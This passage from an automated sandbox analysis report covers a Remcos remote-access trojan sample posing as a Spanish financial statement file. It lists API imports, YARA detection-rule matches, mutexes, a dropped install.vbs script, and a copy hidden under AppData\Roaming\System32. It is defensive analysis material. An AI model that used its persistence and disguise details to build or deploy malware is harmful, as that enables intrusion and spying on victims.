U?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai25_2_0040D2A6
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040D2A67_2_0040D2A6
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_014E365815_2_014E3658
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_014E3DC015_2_014E3DC0
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 16_2_019205B216_2_019205B2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 16_2_0192365816_2_01923658
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 16_2_01923DC016_2_01923DC0
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 24_2_010335D024_2_010335D0
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 24_2_01033DC024_2_01033DC0
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040D2A625_2_0040D2A6
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: String function: 00413E72 appears 49 times
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: String function: 0041203B appears 31 times
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: String function: 00413E72 appears 49 times
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: String function: 0041203B appears 31 times
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6880 -s 1496
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PxxoServicesTrialNet1.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PxxoServicesTrialNet1.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PxxoServicesTrialNet1.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeBinary or memory string: OriginalFilename vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUFbf XIv.exe2 vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.716361441.0000000005DC0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.709233026.00000000040C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.715918875.00000000056E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000000.644631628.0000000000AB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWABMIG.EXEj% vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701101686.000000000140B000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.717683351.0000000005EB0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.717683351.0000000005EB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000007.00000002.665579232.0000000003200000.00000002.00000001.sdmpBinary or memory string: originalfilename vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000007.00000002.665579232.0000000003200000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000007.00000002.664694836.000000000041D000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameUFbf XIv.exe2 vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000007.00000000.660005236.0000000000AB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWABMIG.EXEj% vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000007.00000002.665195248.0000000002E50000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmpBinary or memory string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@45/17@5/2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,7_2_0040EC0F
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,25_2_0040EC0F
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00409A2F
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource,7_2_00409D02
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00411927
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe File created: C:\Users\user\AppData\Roaming\System32
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6880
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_01
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Mutant created: \Sessions\1\BaseNamedObjects\RemcosX2-Y057I8
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5772
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6648
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe File created: C:\Users\user\AppData\Local\Temp\install.vbs
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
